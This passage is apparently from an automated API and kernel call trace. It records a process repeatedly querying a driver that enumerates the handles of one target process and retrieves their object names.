lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0224.396] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.396] PsAcquireProcessExitSynchronization () returned 0x0 [0224.397] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.397] ObReferenceObjectByHandle (in: Handle=0x53c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800383e070, HandleInformation=0x0) returned 0x0 [0224.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.397] PsReleaseProcessExitSynchronization () returned 0x2 [0224.397] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.397] ObQueryNameString (in: Object=0xfffffa800383e070, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.397] ObfDereferenceObject (Object=0xfffffa800383e070) returned 0x2 [0224.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.397] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.397] PsAcquireProcessExitSynchronization () returned 0x0 [0224.397] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.397] ObReferenceObjectByHandle (in: Handle=0x554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a49220, HandleInformation=0x0) returned 0x0 [0224.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.397] PsReleaseProcessExitSynchronization () returned 0x2 [0224.397] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.397] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.397] ObfDereferenceObject (Object=0xfffffa8003a49220) returned 0x1 [0224.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.397] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.398] PsAcquireProcessExitSynchronization () returned 0x0 [0224.398] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.398] ObReferenceObjectByHandle (in: Handle=0x56c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fa3cb0, HandleInformation=0x0) returned 0x0 [0224.398] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.398] PsReleaseProcessExitSynchronization () returned 0x2 [0224.398] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.398] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.398] ObfDereferenceObject (Object=0xfffffa8001fa3cb0) returned 0x1 [0224.398] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.398] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.398] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.398] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.398] PsAcquireProcessExitSynchronization () returned 0x0 [0224.398] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.398] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017b7960, HandleInformation=0x0) returned 0x0 [0224.398] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.398] PsReleaseProcessExitSynchronization () returned 0x2 [0224.398] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.398] ObQueryNameString (in: Object=0xfffff8a0017b7960, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.398] ObfDereferenceObject (Object=0xfffff8a0017b7960) returned 0x1 [0224.399] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.399] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.399] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.399] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0224.399] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.399] PsAcquireProcessExitSynchronization () returned 0x0 [0224.399] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.399] ObReferenceObjectByHandle (in: Handle=0x574, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fa42b0, HandleInformation=0x0) returned 0x0 [0224.399] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.399] PsReleaseProcessExitSynchronization () returned 0x2 [0224.399] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.399] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.399] ObfDereferenceObject (Object=0xfffffa8001fa42b0) returned 0x1 [0224.399] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.399] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.399] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.399] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.399] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.399] PsAcquireProcessExitSynchronization () returned 0x0 [0224.399] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.399] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003993f20, HandleInformation=0x0) returned 0x0 [0224.399] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.399] PsReleaseProcessExitSynchronization () returned 0x2 [0224.399] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.399] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.399] ObfDereferenceObject (Object=0xfffffa8003993f20) returned 0x1 [0224.400] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.400] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.400] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.400] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0224.400] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.400] PsAcquireProcessExitSynchronization () returned 0x0 [0224.400] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.400] ObReferenceObjectByHandle (in: Handle=0x58c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003993dd0, HandleInformation=0x0) returned 0x0 [0224.400] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.400] PsReleaseProcessExitSynchronization () returned 0x2 [0224.400] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.400] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.400] ObfDereferenceObject (Object=0xfffffa8003993dd0) returned 0x1 [0224.400] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.400] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.400] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.400] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0224.400] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.400] PsAcquireProcessExitSynchronization () returned 0x0 [0224.400] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.400] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003993c80, HandleInformation=0x0) returned 0x0 [0224.400] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.400] PsReleaseProcessExitSynchronization () returned 0x2 [0224.401] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.401] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.401] ObfDereferenceObject (Object=0xfffffa8003993c80) returned 0x1 [0224.401] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.401] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.401] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.401] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.401] PsAcquireProcessExitSynchronization () returned 0x0 [0224.401] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.401] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017bb060, HandleInformation=0x0) returned 0x0 [0224.401] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.401] PsReleaseProcessExitSynchronization () returned 0x2 [0224.401] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.401] ObQueryNameString (in: Object=0xfffff8a0017bb060, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.401] ObfDereferenceObject (Object=0xfffff8a0017bb060) returned 0x1 [0224.401] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.401] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.401] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.401] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.401] PsAcquireProcessExitSynchronization () returned 0x0 [0224.401] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.401] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003993b30, HandleInformation=0x0) returned 0x0 [0224.402] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.402] PsReleaseProcessExitSynchronization () returned 0x2 [0224.402] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.402] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.402] ObfDereferenceObject (Object=0xfffffa8003993b30) returned 0x1 [0224.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.402] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.402] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0224.402] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.402] PsAcquireProcessExitSynchronization () returned 0x0 [0224.402] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.402] ObReferenceObjectByHandle (in: Handle=0x5a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fa4160, HandleInformation=0x0) returned 0x0 [0224.402] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.402] PsReleaseProcessExitSynchronization () returned 0x2 [0224.402] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.402] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.402] ObfDereferenceObject (Object=0xfffffa8001fa4160) returned 0x1 [0224.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.402] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.402] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.402] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.402] PsAcquireProcessExitSynchronization () returned 0x0 [0224.402] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.403] ObReferenceObjectByHandle (in: Handle=0x5ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017bd4c0, HandleInformation=0x0) returned 0x0 [0224.403] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.403] PsReleaseProcessExitSynchronization () returned 0x2 [0224.403] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.403] ObQueryNameString (in: Object=0xfffff8a0017bd4c0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.403] ObfDereferenceObject (Object=0xfffff8a0017bd4c0) returned 0x1 [0224.403] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.403] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.403] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.403] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0224.403] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.403] PsAcquireProcessExitSynchronization () returned 0x0 [0224.403] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.403] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0224.403] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.403] PsReleaseProcessExitSynchronization () returned 0x2 [0224.403] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.403] ObQueryNameString (in: Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.403] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0224.403] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.403] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.403] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.403] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0224.403] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.403] PsAcquireProcessExitSynchronization () returned 0x0 [0224.403] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.404] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037d9630, HandleInformation=0x0) returned 0x0 [0224.404] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.404] PsReleaseProcessExitSynchronization () returned 0x2 [0224.404] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.404] ObQueryNameString (in: Object=0xfffffa80037d9630, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.404] ObfDereferenceObject (Object=0xfffffa80037d9630) returned 0x11 [0224.404] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.404] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.404] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0224.404] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.404] PsAcquireProcessExitSynchronization () returned 0x0 [0224.404] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.404] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037872d0, HandleInformation=0x0) returned 0x0 [0224.404] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.404] PsReleaseProcessExitSynchronization () returned 0x2 [0224.404] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.404] ObQueryNameString (in: Object=0xfffffa80037872d0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.405] ObfDereferenceObject (Object=0xfffffa80037872d0) returned 0x11 [0224.405] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.405] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.405] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0224.405] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.405] PsAcquireProcessExitSynchronization () returned 0x0 [0224.405] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.405] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003926700, HandleInformation=0x0) returned 0x0 [0224.405] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.405] 